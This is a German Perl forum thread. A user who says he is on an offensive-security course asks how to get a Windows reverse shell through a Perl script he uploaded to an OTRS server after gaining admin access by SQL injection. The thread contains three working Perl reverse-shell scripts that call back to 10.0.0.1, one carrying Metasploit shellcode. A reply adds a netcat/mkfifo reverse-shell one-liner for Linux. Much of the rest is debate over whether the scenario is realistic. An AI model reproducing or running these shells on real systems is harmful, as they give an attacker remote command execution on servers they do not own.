reverse tcp shell (Perl/CGI) - Perl-Community.de

Start · Board · Webprogrammierung mit Perl · Perl/CGI

2024-11-24 09:34:22
Europe/Berlin
Einloggen (Registrieren)
- Einstellungen
- Statistics
Jemand zu Hause?
0 Benutzer online
1 Gast

[thread]18642[/thread]

submit to reddit

reverse tcp shell

Tags: perl5 CGI Ähnliche Threads

Leser: 23

Articles: hide open all | hide show old branches

+38 replies
Whook

2013-09-30 14:50
User since
2013-09-30
7 Artikel
BenutzerIn
Hallo,
ich versuche auf eine Windows Maschine (Apache,Perl) ein Perl Script hochzuladen, dass eine Reverse Shell Verbindung aufbaut und dann cmd.exe darin umleitet.

Den Verbindungsaufbau bekomme ich hin, leider kein Comand Prompt.

Eines vielleicht gleich vorweg, ja, ich versuche hier ein Fremdsystem zu hacken aber das soll ich auch machen, es handelt sich um eine Security Challenge, ich mache gerade einen Kurs hier: www.offensive-security.com

Ich habe mehrere Versuche:

Versuch1:
Code (perl): (dl )

1 2 3 4 5 6 7 8

#!c:/perl/bin/perl.exe use IO::Socket; ## meine IP= 10.0.0.1 $socket = new IO::Socket::INET(PeerAddr,"10.0.0.1:1234"); STDIN->fdopen($socket,r); $~->fdopen($socket,w); system$_ while<>;
Versuch 2:
Code (perl): (dl )

1 2 3 4 5 6 7 8 9 10 11 12 13

#!c:/perl/bin/perl.exe use Socket; $i="10.0.0.1"; $p=4444; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); ##exec("cmd.exe"); #hatte erst das probiert system("start cmd.exe /k $cmd"); };
Versuch 3 mit generierter Shell durch msfpayload:
Code (perl): (dl )

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

#!c:/perl/bin/perl.exe use IO::Socket; # windows/shell_reverse_tcp - 314 bytes # http://www.metasploit.com # VERBOSE=false, LHOST=10.0.0.1, LPORT=1234, # ReverseConnectRetries=5, ReverseAllowProxy=false, # PrependMigrate=false, EXITFUNC=process, # InitialAutoRunScript=, AutoRunScript= $shell = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" . "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" . "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" . "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" . "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" . "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" . "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" . "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" . "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" . "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" . "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" . "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" . "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" . "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" . "\xc0\xa8\x0e\x7d\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56" . "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" . "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" . "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" . "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" . "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" . "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" . "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" . "\x6f\x6a\x00\x53\xff\xd5"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "10.0.0.1", PeerPort => "1234") or die "Keine Verbindung"; $socket->recv($sd, 1024); in $sd print "$sd"; $socket->send($shell);
Last edited: 2013-09-30 16:22:10 +0200 (CEST)
- Linuxer
  
  2013-09-30 15:37
  User since
  2006-01-27
  3890 Artikel
  HausmeisterIn
  Schade, dass Du es offensichtlich nicht geschafft hast, die Hinweise zum Posten zu lesen. Die sind über dem Beitragsfenster verlinkt mit: Bitte zuerst lesen: Hinweise Und der Klick auf Hinweise bringt einen weiter...
  
  Direktlink zur Formatierung von Code-Beispielen:
  http://wiki.perl-community.de/Wissensbasis/Allgeme...
  
  Also, bitte Code-Tags nachtragen! Danke.
  
  Beispiele:
  [code=perl] #hier Dein Perl Code. [/code]
  
  Code (perl): (dl )
  
  #hier Dein Perl Code.
  
  [code] hier anderer Code oder Beispieldaten. [/code]
  
  Code: (dl )
  
  1 2 3 4 5
  
  hier anderer Code oder Beispieldaten.
  
  meine Beiträge: I.d.R. alle Angaben ohne Gewähr und auf Linux abgestimmt!
  Die Sprache heisst Perl, nicht PERL. - Bitte Crossposts als solche kenntlich machen!
- +2 replies
- bianca
  
  2013-09-30 16:26
  
  User since
  2009-09-13
  7016 Artikel
  BenutzerIn
  
  Wie willst du es denn schaffen, dass das Script auf dem Server überhaupt zur Ausführung kommt?
  10 print "Hallo"
  20 goto 10
  - Whook
    
    2013-09-30 16:37
    
    User since
    2013-09-30
    7 Artikel
    BenutzerIn
    
    Das funktioniert ja soweit bereits. Das Script ist am Server hochgeladen. Jetzt starte ich lokal Netcat und öffne das Script mit meinem Browser. Es verbindet sich zu meiner lokalen Anwendung.
    Jetzt muss ich nur mehr am Server cmd.exe starten und in den Socket umleiten, Tata da ist die Remote Shell.
    
    Frage wie starte ich cmd.exe in Perl und wie leite ich die shell vom Standio in den Socket um?
- +31 replies
- Linuxer
  
  2013-09-30 16:36
  
  User since
  2006-01-27
  3890 Artikel
  HausmeisterIn
  
  Wenn Du ein Fremdsystem hacken willst, ist es IMHO suboptimal, die eigene IP-Adresse anzusprechen...?
  meine Beiträge: I.d.R. alle Angaben ohne Gewähr und auf Linux abgestimmt!
  Die Sprache heisst Perl, nicht PERL. - Bitte Crossposts als solche kenntlich machen!
  - +30 replies
  - Whook
    
    2013-09-30 16:41
    
    User since
    2013-09-30
    7 Artikel
    BenutzerIn
    
    Das tue ich ja auch nicht!
    
    Wie Du im attachment sehen kannst, die Verbindung vom Server zu mir funktioniert einwandfrei!
    
    Vielleicht sollte ich den geplanten Ablauf klarstellen:
    Ich habe Zugriff auf den Webserver und kann dort Files hochladen. Die Idee ist, ich rufe das Perl Script auf, es wird am Webserver ausgeführt und etabliert vom Webserver ausgehend einen TCP Socket zu meiner Machine. Dadurch werden Restriktionen durch eine Firewall umgangen.
    Das alles geht soweit, nur halt den cmd.exe in den Socket umleiten, da hakt es
    Anhänge
    
    image/png
    808 x 82
    Screenshot.png
    
    Last edited: 2013-09-30 16:55:45 +0200 (CEST)
    - +29 replies
    - bianca
      
      2013-09-30 17:05
      
      User since
      2009-09-13
      7016 Artikel
      BenutzerIn
      
      2013-09-30T14:41:43 Whook
      Ich habe Zugriff auf den Webserver und kann dort Files hochladen.
      
      Aber wo liegt denn der Witz, wenn du eh Zugriff hast. Das ist doch dann kein echter Penetrationstest, oder?
      Bezüglich Kommandozeile+Windows+Perl hab ich jetzt sehr gute Erfahrung mit IPC::Run gesammelt. Sämtliche anderen Module taugen für bidirektionale Kommunikation nicht auf Windows.
      10 print "Hallo"
      20 goto 10
      - +28 replies
      - Whook
        
        2013-09-30 18:05
        
        User since
        2013-09-30
        7 Artikel
        BenutzerIn
        
        Ok, ich erzähle die ganze Geschichte, dann wird auch klar wo der Witz liegt.
        
        Auf dem Server läuft ein eine Webanwendung ein Ticketing System. Durch diese Anwendung kann ich nun Files auf das Filesystem hochladen.
        
        Ziel eines jeden Pentesters ist natürlich eine Remote Shell mit Root rechten. Ich kanns mir einfach machen und einfach eine der Perl cmd shells hochladen, ich will aber meine eigene zusammenbringen.
        
        Ich kann also derzeit files hochladen brauche aber eine shell.
        
        +27 replies
        
        bianca
        
        2013-09-30 18:10
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        Hab immer noch nicht verstanden, wie das Script zur Ausführung kommen sollte.
        10 print "Hallo"
        20 goto 10
        
        +26 replies
        
        Whook
        
        2013-10-01 03:06
        
        User since
        2013-09-30
        7 Artikel
        BenutzerIn
        
        Das script lade ich auf den Server den ich angreife hoch, dann lade ich das PL Script mit meinem Browser.
        
        +25 replies
        
        bianca
        
        2013-10-01 05:37
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        Was soll das denn für ein Server sein, auf dem hochgeladene Anhänge in ein aus dem Web erreichbares ausführbares Verzeichnis gelegt werden?
        Das gibt es doch in der Realität garnicht.
        10 print "Hallo"
        20 goto 10
        
        +23 replies
        
        martin.g
        
        2013-10-01 07:30
        
        User since
        2013-09-20
        40 Artikel
        BenutzerIn
        
        Muss man das denn ausdiskutieren? Er weiß, was er will und er hat eine klare Frage formuliert.
        
        Solch eine Art des Angriffs ist aber sicher eine der häufigsten in der Praxis. Ich habe in den letzten Jahren Skripte auf Webservern gesehen, dass ich mit den Ohren schlackerte. Meist werden Sicherheitslücken in Webanwendungen genutzt, um das Skript auf den Server zu bringen. Häufig ist es sogar so, dass PHP Anwendungen attackiert werden, um Perl Skripte nach oben zu bringen. Ohne Wertung für oder gegen PHP, aber PHP Anwendungen sind im Consumer Bereich einfach verbreiteter und deshalb ein lohnenswertes Ziel. Ob sein Skript nun per Browser, ungeschütztes Cron Verzeichnis oder sonstwas aufgerufen wird, spielt weder für seine Challenge noch für die Realität eine große Rolle.
        
        Und wenn Dir all das immer noch nicht einleuchtet, dann nimm einfach das einfachste Szenario: Du hast Webspace (oder einen gehackten FTP Account) und willst Kunden des gleichen Servers angreifen.
        
        Kurzum: Sein Szenario ist gängig. Natürlich sind Challenges immer erstmal konstruiert, aber es wird auch in Stufen vorgegangen. File hochbringen ist das eine, eine Shell bekommen, ein anderes Thema.
        
        Nachtrag: Eben gesehen, dass es sicht scheinbar nicht um ein übliches HackIt handelt, sondern um einen richtigen Kurs. Ändert aber an der Sache nichts.
        Last edited: 2013-10-01 07:37:56 +0200 (CEST)
        
        +22 replies
        
        bianca
        
        2013-10-01 08:27
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T05:30:25 martin.g
        Muss man das denn ausdiskutieren? Er weiß, was er will und er hat eine klare Frage formuliert.
        
        Ich lasse mich von dir nicht beschränken hinsichtlich meiner Fragen. Das ist ein öffentliches Forum. Wenn er nicht antworten möchte wird er es lassen, dafür braucht er keinen Anwalt.
        
        Das Thema interessiert mich deshalb, weil ich evtl. eigene Sicherheitslücken auch gern stopfen würde.
        
        Aber aus dem Web Frontend hochgeladene Attachments für ein Ticketsystem in ausführbare und von außen aufrufbare öffentliche Bereiche abzulegen ist ja wirklich das dämlichste, was ich je gelesen habe. Kann kaum glauben, dass es das in der Realität wirklich geben soll.
        Das erschien mir jetzt so unglaubhaft, dass ich ernsthaft dachte, ich hätte das nicht richtig verstanden, daher fragte ich nochmal nach.
        
        Gehackter FTP Acctount ist natürlich was anderes aber das ist nicht wirklich ein Penetrationstest sondern ein Angriff von "innen". Und dass man damit alles kaputt machen kann braucht man eigentlich nicht erst testen.
        
        Und Webspace ist selbstverständlich so konfiguriert, dass ich in die Bereiche anderer Kunden keine Schreibberechtigung habe. Wo gibt es das denn alles offen? Wäre im übrigen auch ein Angriff von "innen".
        
        @Whook: Wenn das nicht zu vertraulich wird würde ich schon gern Details darüber von dir lesen. Aus reinem Lerneffekt, insbesondere in Sicherheitsfragen.
        Last edited: 2013-10-01 08:30:31 +0200 (CEST)
        10 print "Hallo"
        20 goto 10
        
        gelöscht 2013-10-01 08:28
        
        +4 replies
        
        martin.g
        
        2013-10-01 09:38
        
        User since
        2013-09-20
        40 Artikel
        BenutzerIn
        
        Tut mir leid, wenn ich Dir zu nahe getreten bin, aber ich konnte keine ernsthafte Frage erkennen.
        
        Er schreibt, dass es sich um einen Kurs/Challenge/was-auch-immer handelt. Es ist davon auszugehen, dass das Kursziel nicht ist, ein perfektes System zu hacken. Also gibt es eben eine Sicherheitslücke auf dem System.
        Beispiel für erreichbare Dateien, die aus dem Internet hochgeladen werden? Dieses Forum. Ich hänge einen Anhang an und kann ihn generell erreichen. Ist die Software nun buggy, dann setzt sie vielleicht die Dateirechte falsch. Ferner prüft sie vielleicht den Dateityp nicht. Solange ich Bilder hochlade und diese Bilder executable sind, stört das noch niemand. Lade ich nun ein .pl hoch und habe in diesem Verzeichnis einen passenden Handler aktiv, sieht es schon anders aus. Bei einem Ticketsystem mit Web-GUI müssen die Anhänge ebenfalls in öffentlichen Ordnern liegen.
        
        Zugegegebenermaßen ist das ein konstruiertes Beispiel, aber die Welt ist leider nicht perfekt. Tut mir leid, Bianca, aber wie meinst Du, dass sich diverse Botnetze, Skriptkiddie Hacks usw. verbreiten? Ich vermute, dass sich annähernd 98% aller Webserverhacks zu ähnlichen Teilen zwischen "Wie kann man nur so nen Blödsinn programmieren?" Sicherheitslücken und Uralt-Sicherheitslücken in Standardsoftware aufteilen.
        Komplexe Sicherheitslücken hat vermutlich fast jede Software. Aber Aufwand für den Hacker müssen auch in Relation zum Nutzen stehen und deshalb werden viele dieser Lücken vermutlich nie entdeckt und folglich nicht behoben.
        Last edited: 2013-10-01 09:41:29 +0200 (CEST)
        
        +3 replies
        
        bianca
        
        2013-10-01 09:48
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T07:38:49 martin.g
        Tut mir leid, wenn ich Dir zu nahe getreten bin, aber ich konnte keine ernsthafte Frage erkennen.
        
        Ist ok.
        
        2013-10-01T07:38:49 martin.g
        Dieses Forum. Ich hänge einen Anhang an und kann ihn generell erreichen.
        
        Nein, kannst du nicht. Denn battie liest den Anhang und printet ihn an den Browser. Was du erreichst ist lediglich das Frontend battie aber niemals das Attachment selbst. Von einer Scriptausführung ist das weit entfernt.
        Und mir wäre absolut unbegreiflich, wie man mit "unsicherem" Content anders verfahren könnte. Alles andere wäre ja schon nicht mehr fahrlässig sondern grob vorsätzlich.
        Oder habe ich es immer noch nicht verstanden?
        10 print "Hallo"
        20 goto 10
        
        +2 replies
        
        martin.g
        
        2013-10-01 10:01
        
        User since
        2013-09-20
        40 Artikel
        BenutzerIn
        
        Tut mir leid, dass ich das jetzt platt abbügeln muss. Dieses Forum ist nicht in zwei Wochen mit heißer Nadel von Anfängern gestrickt worden.
        Ich könnte jetzt versuchen, Dich mit einem Hinweis auf langjährige Erfahrung im Serverumfeld, zu überzeugen. Vermutlich wird das nicht funktionieren, also lasse ich es bleiben.
        
        Nimm einfach an, dass es viel Software da draußen gibt, die große Schwächen hat. Und es ist nur von einer einzigen klitzekleinen Software die Rede und die lädt eben Dateien hoch, die man danach aus dem Internet direkt erreichen kann. Das ist keinster Weise unrealistisch oder hinkonstruiert. Und es spielt auch keine Rolle, ob diese Datei direkt oder per Cron oder per anderer Datei oder per was auch immer ausgeführt wird. Sie wird eben ausgeführt und er möchte eine Shell erzeugen.
        
        bianca
        
        2013-10-01 12:32
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T08:01:03 martin.g
        Dieses Forum ist nicht in zwei Wochen mit heißer Nadel von Anfängern gestrickt worden.
        
        Ja, weiß ich. Aber was hat das jetzt mit dem Thema zu tun?
        
        2013-10-01T08:01:03 martin.g
        Ich könnte jetzt versuchen, Dich mit einem Hinweis auf langjährige Erfahrung im Serverumfeld, zu überzeugen. Vermutlich wird das nicht funktionieren, also lasse ich es bleiben.
        
        Warum wirst du persönlich?
        Warum sollte das nicht funktionieren?
        Wovon willst du mich denn eigentlich überzeugen? Oder wolltest es?
        
        2013-10-01T08:01:03 martin.g
        klitzekleinen Software die Rede und die lädt eben Dateien hoch, die man danach aus dem Internet direkt erreichen kann. Das ist keinster Weise unrealistisch oder hinkonstruiert.
        
        Kann ich nicht beurteilen, weil es nirgendwo eine Tabelle dafür gibt. Ich kann mir nach wie vor nicht vorstellen, dass es davon so viele geben soll.
        Kennst du soviele Anwendungen wo das so ist, dass du da so sicher bist?
        Unbestritten gibt es viele Seuchen im Netz aber wie groß ist deren Anteil, der sich allein dadurch verteilt, weil hochgeladene Scripte ausführbar sind?
        Das liest sich für mich als würden die meisten Verkehrsunfälle passieren, weil die Fahrer das Bremspedal mit dem Gaspedal verwechseln, um mal einen Vergleich mit etwa der gleichen Banalität zu ziehen.
        
        2013-10-01T08:01:03 martin.g
        Und es spielt auch keine Rolle, ob diese Datei direkt oder per Cron oder per anderer Datei oder per was auch immer ausgeführt wird. Sie wird eben ausgeführt und er möchte eine Shell erzeugen.
        
        Finde schon, dass das eine Rolle spielt, denn das Ausführen ist ja der Knackpunkt.
        Aber ganz isoliert betrachtet kann ich nachvollziehen was du meinst. Es geht um das Ausführen der Shell und nicht wie das Script dort hin kommt.
        Dann glaube ich zumindest zu wissen, dass ich an dieser Stelle nichts zu verbessern habe. Darum ging es mir ja. Wollte nicht den ganzen Test in Frage stellen oder deine Kompetenz anzweifeln. Wollte nur verstehen, worum es genau geht.
        10 print "Hallo"
        20 goto 10
        
        +16 replies
        
        martin.g
        
        2013-10-01 09:50
        
        User since
        2013-09-20
        40 Artikel
        BenutzerIn
        
        2013-10-01T06:27:51 bianca
        Gehackter FTP Acctount ist natürlich was anderes aber das ist nicht wirklich ein Penetrationstest sondern ein Angriff von "innen". Und dass man damit alles kaputt machen kann braucht man eigentlich nicht erst testen.
        
        Und Webspace ist selbstverständlich so konfiguriert, dass ich in die Bereiche anderer Kunden keine Schreibberechtigung habe. Wo gibt es das denn alles offen? Wäre im übrigen auch ein Angriff von "innen".
        
        Es spielt hier keine Rolle, ob der Angriff "von innen" erfolgt, oder nicht. Fakt ist, dass er eine Datei hochschieben kann und dass er erreicht, dass sie mit Webserver Rechten ausgeführt wird. Er kann in diesem Stadium keinesweg "alles kaputt machen", weil er dazu keine Rechte. Aus diesem Grund will er ja eine Shell öffnen und sich (vermutlich in einem Folgeschritt) root Rechte in dieser Shell verschaffen.
        
        "Webspace ist selbstverständlich so konfiguriert, dass ich in die Bereiche anderer Kunden keine Schreibberechtigung habe". Klar, träum weiter. Logisch müsste das so sein. Praktisch steht sicher auch alleine in diesem Forum x-mal, dass Perl Programme sich nicht ausführen ließen, obwohl alles auf 777 gesetzt wurde.
        Ferner laufen sicher auch heute noch viele Webserver unter einem Benutzer für alle VHosts. Es ist ja schonmal gut, wenn der Webserver überhaupt unter einem speziellen Benutzer läuft.
        
        +15 replies
        
        bianca
        
        2013-10-01 09:58
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T07:50:16 martin.g
        "Webspace ist selbstverständlich so konfiguriert, dass ich in die Bereiche anderer Kunden keine Schreibberechtigung habe". Klar, träum weiter. Logisch müsste das so sein.
        
        OK, dann sprechen wir hier aber wirklich von der untersten Stufe an Basics.
        
        Ich dachte bei der ganzen Sache eher an so spezielle Angriffslöcher wie kaputtes Perl, kaputtes CGI Modul, falsch eingestellter/kaputter Apache etc.
        10 print "Hallo"
        20 goto 10
        
        martin.g
        
        2013-10-01 10:15
        
        User since
        2013-09-20
        40 Artikel
        BenutzerIn
        
        Klar ist es eine Riesendummheit des Users. Aber genau diese Dummheiten werden eben genutzt. Es ist auch eine Riesendummheit in PHP mit register_globals zu arbeiten. Dennoch wurde es jahrelang gemacht und ist erst in den letzten Jahren Default der meisten Distributionen geworden, das zu verbieten.
        
        Diese ganze "Hackerei" teilt sich für mich grob in zwei Teile auf:
        Massenabfertigung und Individualservice.
        Die Massenabfertigung (für Spamattacken, Botnetze usw.) hält sich nicht damit auf, besonders raffinierte Sicherheitslücken aufzudecken. In der Zeit, eine Minihürde zu überwinden, sind schon hundert andere System infiziert, die diese Mini-Hürde eben nicht haben.
        Pech hast Du, wenn Du den Individualservice buchst (why-ever - du hast Dich bei irgendwelchen Gruppen unbeliebt gemacht usw.). Wenn der Atem der Angreifer lange genug ist, werden sie etwas finden, um einzudringen. Punkt.
        
        Aber der Markt zielt auch eher auf die erste Gruppe ab. Ich habe Webspace mit einem Einfallstor. Jemand dringt ein und seine erste Aktion wird sein, seinen Schadcode an andere Stellen zu verteilen. Und dabei werden in der Tat die Löcher der untersten Stufe zuerst versucht. Alle PHP Dateien auf dem Server finden und in diese oder jene kommen dann eben paar Zeilen zusätzlich. Wenn 100 Kunden auf einem Server sind und nur einer gerade "versuchsweise" mal alle Rechte auf 777 setzt, dann hat der eben gewonnen.
        
        IT-Sicherheit geht so. Suche Dir die einfachsten Einfallstore. Wenn Du dort keine findest, wäge Aufwand/Nutzen/Können ab und versuche es weiter oder suche Dir das nächste leichte Opfer.
        
        +13 replies
        
        Whook
        
        2013-10-01 12:35
        
        User since
        2013-09-30
        7 Artikel
        BenutzerIn
        
        Hallo,
        ich habe doch geschrieben, dass auf dem Server eine Webanwendung läuft, ein Ticketing System. Ich habe mir zunächst für diese Webanwendung durch SQL Injection Loginrechte verschafft und verfüge nun über Adminrechte in der Webanwendung. Daher kann ich auch Files hochladen.
        
        Was daran nicht der Realität entsprechen soll ist mir rätselhaft!
        
        Und auf Deine Frage was das für ein System ist, es handelt sich um dieses Produkt www.otrs.com
        Last edited: 2013-10-01 12:37:52 +0200 (CEST)
        
        bianca
        
        2013-10-01 12:55
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T10:35:43 Whook
        Ich habe mir zunächst für diese Webanwendung durch SQL Injection Loginrechte verschafft
        
        DAS war die mir fehlende Info.
        Danke dir.
        Damit für mich beantwortet und erledigt.
        
        2013-10-01T10:35:43 Whook
        Was daran nicht der Realität entsprechen soll ist mir rätselhaft!
        
        Erstens wußte ich das nicht bzw. habe es bisher übersehen und zweitens nutze ich keine Datenbanken. Von daher kann ich nicht beurteilen, wie das bei Datenbanken läuft und wie realistisch das ist.
        
        2013-10-01T10:35:43 Whook
        Und auf Deine Frage was das für ein System ist, es handelt sich um dieses Produkt www.otrs.com
        
        Danke für die Info.
        10 print "Hallo"
        20 goto 10
        
        +5 replies
        
        GwenDragon
        
        2013-10-01 13:05
        
        User since
        2005-01-17
        14748 Artikel
        Admin1
        
        Hihi, "Otters" ist Perl. Und da gibts SQL-Injections für Logins. Ohoh.
        die Drachin Gwen
        
        Meine Perl-Artikel · perldev – verschiedene Perl-Versionen unter Windows starten
        
        +4 replies
        
        bianca
        
        2013-10-01 13:12
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        Vor allem hasse ich es, wenn einem da gleich ein JS Fehler ins Gesicht springt.
        Was sind das heutzutage für Programmierer?
        Früher, als JS Fehler im IE noch standardmäßig angezeigt wurden gab es das nicht so häufig. Mittlerweile scheint das allen egal zu sein. GRRRR
        10 print "Hallo"
        20 goto 10
        
        +3 replies
        
        GwenDragon
        
        2013-10-01 15:46
        
        User since
        2005-01-17
        14748 Artikel
        Admin1
        
        2013-10-01T11:12:59 bianca
        Vor allem hasse ich es, wenn einem da gleich ein JS Fehler ins Gesicht springt.
        Was sind das heutzutage für Programmierer?
        Niemand zwingt dich dauernd deinen Browser als Debugger für Webseiten zu missbrauchen.
        die Drachin Gwen
        
        Meine Perl-Artikel · perldev – verschiedene Perl-Versionen unter Windows starten
        
        +2 replies
        
        bianca
        
        2013-10-01 17:37
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T13:46:00 GwenDragon
        Niemand zwingt dich dauernd deinen Browser als Debugger für Webseiten zu missbrauchen.
        
        So kann man es auch ausdrücken.
        Ist ja eher versehentlich, dass ich für unbekannte Webseiten vergesse, einen anderen Browser zu nutzen. Bei größeren Firmen gehe ich eigentlich von fehlerfreien Seiten aus, werde aber ebenso oft enttäuscht. Für mich völlig unverständlich, wie niedrig inzwischen die Ansprüche an Qualität geworden sind.
        10 print "Hallo"
        20 goto 10
        
        GwenDragon
        
        2013-10-01 17:54
        
        User since
        2005-01-17
        14748 Artikel
        Admin1
        
        Die Ansprüche an Webseiten waren nie hoch.
        Der IE hat das über Jahre begünstigt mit seinen freakigen Umsetzungen von HTML, CSS und JS.
        Aber das wird zu sehr Off topic.
        die Drachin Gwen
        
        Meine Perl-Artikel · perldev – verschiedene Perl-Versionen unter Windows starten
        
        +6 replies
        
        renee
        
        2013-10-01 18:24
        
        User since
        2003-08-04
        14371 Artikel
        ModeratorIn
        
        2013-10-01T10:35:43 Whook
        Und auf Deine Frage was das für ein System ist, es handelt sich um dieses Produkt www.otrs.com
        
        Kannst du mir per Privatnachricht mal mehr Infos zu dem Hack schicken? Welche OTRS Version? Welches OS und welche Datenbank inkl. Version?
        
        Leider sind noch nicht überall Bind-Parameter im Einsatz, aber die gängigen Kombinationen sind eigentlich ganz gut getestet...
        
        @bianca: Welche JS-Fehler? Welcher Browser? Du kannst auf Github eine Meldung aufmachen. ..
        OTRS-Erweiterungen (http://feature-addons.de/)
        Frankfurt Perlmongers (http://frankfurt.pm/)
        --
        
        Unterlagen OTRS-Workshop 2012: http://otrs.perl-services.de/workshop.html
        Perl-Entwicklung: http://perl-services.de/
        
        +5 replies
        
        bianca
        
        2013-10-01 18:55
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T16:24:30 renee
        @bianca: Welche JS-Fehler? Welcher Browser? Du kannst auf Github eine Meldung aufmachen. ..
        
        Direkt auf der Homepage der Firma:
        
        Code: (dl )
        
        1 2 3 4 5
        
        Meldung: Die Eigenschaft "value" eines undefinierten oder Nullverweises kann nicht abgerufen werden. Zeile: 3 Zeichen: 2 Code: 0 URI: http://www.otrs.com/fileadmin/templates/skins/skin_otrs/js/skin.js?1277740490
        
        Wird deren Homepage über Github gepflegt?
        10 print "Hallo"
        20 goto 10
        
        +2 replies
        
        renee
        
        2013-10-01 20:08
        
        User since
        2003-08-04
        14371 Artikel
        ModeratorIn
        
        Oh, mein Fehler. Ich dachte, du meinst das Ticketsystem an sich... die Website ist mir egal.
        OTRS-Erweiterungen (http://feature-addons.de/)
        Frankfurt Perlmongers (http://frankfurt.pm/)
        --
        
        Unterlagen OTRS-Workshop 2012: http://otrs.perl-services.de/workshop.html
        Perl-Entwicklung: http://perl-services.de/
        
        bianca
        
        2013-10-01 20:21
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        2013-10-01T18:08:58 renee
        die Website ist mir egal.
        
        denen auch :)
        10 print "Hallo"
        20 goto 10
        
        +2 replies
        
        GwenDragon
        
        2013-10-02 07:58
        
        User since
        2005-01-17
        14748 Artikel
        Admin1
        
        Das Theme hat da erhebliche Fehler (Exceptions), z. T. auch mit jQuery, das XHTML ist an einigen Stellen kaputt.
        Schick denen bitte auf http://www.otrs.com/de/unternehmen/kontakt/ übers Kontaktformular eine Meldung wenns dich stört.
        die Drachin Gwen
        
        Meine Perl-Artikel · perldev – verschiedene Perl-Versionen unter Windows starten
        
        bianca
        
        2013-10-02 11:30
        
        User since
        2009-09-13
        7016 Artikel
        BenutzerIn
        
        Ich mache das nicht mehr. Wenn die das selbst nicht merken ziehe ich meine Schlüsse und wende mich davon ab.
        Wundert mich auch nicht, wenn deren Produkte buggi sind :)
        10 print "Hallo"
        20 goto 10
        
        pq
        
        2013-10-01 13:38
        
        User since
        2003-08-04
        12208 Artikel
        Admin1
        
        vielleicht solltest du mal öfter it-newsticker verfolgen?
        ich kann nicht sagen, wie oft, aber immer mal wieder gibts eine meldung von einer software (wie z.b. wordpress o.ä.), dass dort hochgeladene dateien ausgeführt werden konnten.
        Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. -- Damian Conway in "Perl Best Practices"
        lesen: Wie frage ich & perlintro brian's Leitfaden für jedes Perl-Problem
- +3 replies
- topeg
  
  2013-09-30 23:20
  User since
  2006-07-10
  2611 Artikel
  BenutzerIn
  Ja mit netcat ist es unter Linux nicht schwer eine Remoteshell zu erzeugen:
  
  Eigener Rechner: nc -l 45678
  
  Anderer Rechner: mkfifo /tmp/tmp_fifo; cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc 10.0.0.1 1567 > /tmp/tmp_fifo
  
  Mit windows wird es schwirig da die STD-Handles nicht POSIX-Konform sind. Perl versucht sein möglichstes um das zu verbergen. Die Probleme zeigen sich aber, wenn man versucht die Handles umzuleiten. Das funktioniert unter Windows nicht gut. Schau mal in die letzten Threads von bianca in der Beziehung an.
  
  Mein Vorschlag verabschiede dich von der Vorstellung die Konsole umzuleiten. einfacher ist es etwas ähnliches selber zu bauen.
  
  Sende Kommandos an den Client, führe das dort aus und lese die Daten zurück. Damit bekommt man zwar keinen direkten Interaktiven Zugriff (kein Editor oder so was), aber du kannst alles lesen/schreiben was du willst.
  
  Eigenen Rechner:
  
  SERVER:
  more (21.2kb)
  
  Zielsystem:
  
  CLIENT:
  more (20.6kb)
  
  Wenn du den Code gründlich ließt wirst du feststellen das ich immer auch die Länge von Datebsätzen mit gebe. Damit verhindere ich das der Code beim lesen irgendwo hängen bleibt.
  
